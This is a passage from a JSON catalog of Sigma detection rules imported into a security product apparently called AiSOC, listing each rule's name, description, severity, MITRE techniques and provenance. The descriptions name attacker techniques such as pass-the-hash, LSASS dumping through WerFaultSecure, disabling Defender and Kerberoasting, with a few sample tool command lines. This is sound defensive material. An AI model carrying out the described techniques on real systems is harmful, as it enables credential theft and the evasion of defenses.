AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d2de8a6-4803-4fde-b85b-f58f3aa7a705", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_wdac_policy_creation.yml" } }, { "id": "sigmahq-sigma-1d61f71d-59d2-479e-9562-4ff5f4ead16b", "type": "detection", "name": "Suspicious Service Installation", "description": "Detects suspicious service installation commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_susp.yml" } }, { "id": "sigmahq-sigma-1da8ce0b-855d-4004-8860-7d64d42063b1", "type": "detection", "name": "Apache Segmentation Fault", "description": "Detects a segmentation fault error message caused by a crashing apache worker process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1499.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/apache-segmentation-fault.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1da8ce0b-855d-4004-8860-7d64d42063b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/product/apache/web_apache_segfault.yml" } }, { "id": "sigmahq-sigma-1dd05363-104e-4b4a-b963-196a534b03a1", "type": "detection", "name": "Potential Suspicious Mofcomp Execution", "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-mofcomp-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1dd05363-104e-4b4a-b963-196a534b03a1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml" } }, { "id": "sigmahq-sigma-1ddc1472-8e52-4f7d-9f11-eab14fc171f5", "type": "detection", "name": "PowerShell Decompress Commands", "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-decompress-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" } }, { "id": "sigmahq-sigma-1dde5376-a648-492e-9e54-4241dd9b0c7f", "type": "detection", "name": "Diskshadow Script Mode - Uncommon Script Extension Execution", "description": "Detects execution of \"Diskshadow.exe\" in script mode to execute an script with a potentially uncommon extension.\nInitial baselining of the allowed extension list is required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/diskshadow-script-mode-uncommon-script-extension-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1dde5376-a648-492e-9e54-4241dd9b0c7f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml" } }, { "id": "sigmahq-sigma-1de68c67-af5c-4097-9c85-fe5578e09e67", "type": "detection", "name": "WCE wceaux.dll Access", "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wce-wceaux-dll-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" } }, { "id": "sigmahq-sigma-1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "type": "detection", "name": "Potential Script Proxy Execution Via CL_Mutexverifiers.ps1", "description": "Detects the use of the Microsoft signed script \"CL_mutexverifiers\" to proxy the execution of additional PowerShell script commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-script-proxy-execution-via-cl-mutexverifiers-ps1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml" } }, { "id": "sigmahq-sigma-1e53dd56-8d83-4eb4-a43e-b790a05510aa", "type": "detection", "name": "Always Install Elevated MSI Spawned Cmd And Powershell", "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/always-install-elevated-msi-spawned-cmd-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml" } }, { "id": "sigmahq-sigma-1e59c230-6670-45bf-83b0-98903780607e", "type": "detection", "name": "Gpscript Execution", "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gpscript-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e59c230-6670-45bf-83b0-98903780607e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" } }, { "id": "sigmahq-sigma-1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c", "type": "detection", "name": "Arbitrary File Download Via Squirrel.EXE", "description": "Detects the usage of the \"Squirrel.exe\" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-squirrel-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_squirrel_download.yml" } }, { "id": "sigmahq-sigma-1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e", "type": "detection", "name": "PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'", "description": "Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').\nThis is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.\nAn attacker might use this technique via the command line to bypass defenses before executing payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-defender-threat-severity-default-action-set-to-allow-or-noaction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_defender_default_action_modified.yml" } }, { "id": "sigmahq-sigma-1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", "type": "detection", "name": "ADFS Database Named Pipe Connection By Uncommon Tool", "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adfs-database-named-pipe-connection-by-uncommon-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml" } }, { "id": "sigmahq-sigma-1ec65a5f-9473-4f12-97da-622044d6df21", "type": "detection", "name": "Powershell Defender Disable Scan Feature", "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-defender-disable-scan-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ec65a5f-9473-4f12-97da-622044d6df21", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" } }, { "id": "sigmahq-sigma-1edd77db-0669-4fef-9598-165bda82826d", "type": "detection", "name": "Guacamole Two Users Sharing Session Anomaly", "description": "Detects suspicious session with two users present", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/guacamole-two-users-sharing-session-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1edd77db-0669-4fef-9598-165bda82826d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml" } }, { "id": "sigmahq-sigma-1edff897-9146-48d2-9066-52e8d8f80a2f", "type": "detection", "name": "Suspicious Invoke-WebRequest Execution With DirectIP", "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invoke-webrequest-execution-with-directip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1edff897-9146-48d2-9066-52e8d8f80a2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" } }, { "id": "sigmahq-sigma-1eeed653-dbc8-4187-ad0c-eeebb20e6599", "type": "detection", "name": "Potential SPN Enumeration Via Setspn.EXE", "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-spn-enumeration-via-setspn-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml" } }, { "id": "sigmahq-sigma-1f0489be-b496-4ddf-b3a9-5900f2044e9c", "type": "detection", "name": "Suspicious File Write to SharePoint Layouts Directory", "description": "Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.\nThis behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-write-to-sharepoint-layouts-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f0489be-b496-4ddf-b3a9-5900f2044e9c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml" } }, { "id": "sigmahq-sigma-1f0b4cac-9c81-41f4-95d0-8475ff46b3e2", "type": "detection", "name": "PPL Tampering Via WerFaultSecure", "description": "Detects potential abuse of WerFaultSecure.exe to dump Protected Process Light (PPL) processes like LSASS or to freeze security solutions (EDR/antivirus).\nThis technique is used by tools such as EDR-Freeze and WSASS to bypass PPL protections and access sensitive information or disable security software.\nDistinct command line patterns help identify the specific tool:\n- WSASS usage typically shows: \"WSASS.exe WerFaultSecure.exe [PID]\" in ParentCommandLine\n- EDR-Freeze usage typically shows: \"EDR-Freeze_[version].exe [PID] [timeout]\" in ParentCommandLine\nLegitimate debugging operations using WerFaultSecure are rare in production environments and should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ppl-tampering-via-werfaultsecure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f0b4cac-9c81-41f4-95d0-8475ff46b3e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse.yml" } }, { "id": "sigmahq-sigma-1f0f6176-6482-4027-b151-00071af39d7e", "type": "detection", "name": "Arbitrary File Download Via ConfigSecurityPolicy.EXE", "description": "Detects the execution of \"ConfigSecurityPolicy.EXE\", a binary part of Windows Defender used to manage settings in Windows Defender.\nUsers can configure different pilot collections for each of the co-management workloads.\nIt can be abused by attackers in order to upload or download files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-configsecuritypolicy-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f0f6176-6482-4027-b151-00071af39d7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_configsecuritypolicy_download_file.yml" } }, { "id": "sigmahq-sigma-1f1a8509-2cbb-44f5-8751-8e1571518ce2", "type": "detection", "name": "Suspicious Splwow64 Without Params", "description": "Detects suspicious Splwow64.exe process without any command line parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-splwow64-without-params.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_splwow64_cli_anomaly.yml" } }, { "id": "sigmahq-sigma-1f1d8209-636e-4c6c-a137-781cca8b82f9", "type": "detection", "name": "WFP Filter Added via Registry", "description": "Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wfp-filter-added-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f1d8209-636e-4c6c-a137-781cca8b82f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_wfp_filter_added.yml" } }, { "id": "sigmahq-sigma-1f2b5353-573f-4880-8e33-7d04dcf97744", "type": "detection", "name": "Sysmon Configuration Modification", "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-configuration-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_config_modification_status.yml" } }, { "id": "sigmahq-sigma-1f358e2e-cb63-43c3-b575-dfb072a6814f", "type": "detection", "name": "System and Hardware Information Discovery", "description": "Detects system information discovery commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/system-and-hardware-information-discovery.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f358e2e-cb63-43c3-b575-dfb072a6814f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_system_info_discovery2.yml" } }, { "id": "sigmahq-sigma-1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "type": "detection", "name": "Potential Suspicious PowerShell Keywords", "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-powershell-keywords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" } }, { "id": "sigmahq-sigma-1f6399cf-2c80-4924-ace1-6fcff3393480", "type": "detection", "name": "DirectorySearcher Powershell Exploitation", "description": "Enumerates Active Directory to determine computers that are joined to the domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/directorysearcher-powershell-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f6399cf-2c80-4924-ace1-6fcff3393480", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" } }, { "id": "sigmahq-sigma-1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d", "type": "detection", "name": "Remote Access Tool - Team Viewer Session Started On Linux Host", "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-team-viewer-session-started-on-linux-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml" } }, { "id": "sigmahq-sigma-1f7025a6-e747-4130-aac4-961eb47015f1", "type": "detection", "name": "HackTool - DiagTrackEoP Default Named Pipe", "description": "Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses \"SeImpersonate\" privilege.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-diagtrackeop-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f7025a6-e747-4130-aac4-961eb47015f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_diagtrack_eop.yml" } }, { "id": "sigmahq-sigma-1f978c6a-4415-47fb-aca5-736a44d7ca3d", "type": "detection", "name": "Cisco Crypto Commands", "description": "Show when private keys are being exported from the device, or when new certificates are installed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1553.004", "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-crypto-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" } }, { "id": "sigmahq-sigma-1fb76ab8-fa60-4b01-bddd-71e89bf555da", "type": "detection", "name": "Pubprn.vbs Proxy Execution", "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pubprn-vbs-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" } }, { "id": "sigmahq-sigma-1fbc0671-5596-4e17-8682-f020a0b995dc", "type": "detection", "name": "Potential CCleanerDU.DLL Sideloading", "description": "Detects potential DLL sideloading of \"CCleanerDU.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ccleanerdu-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 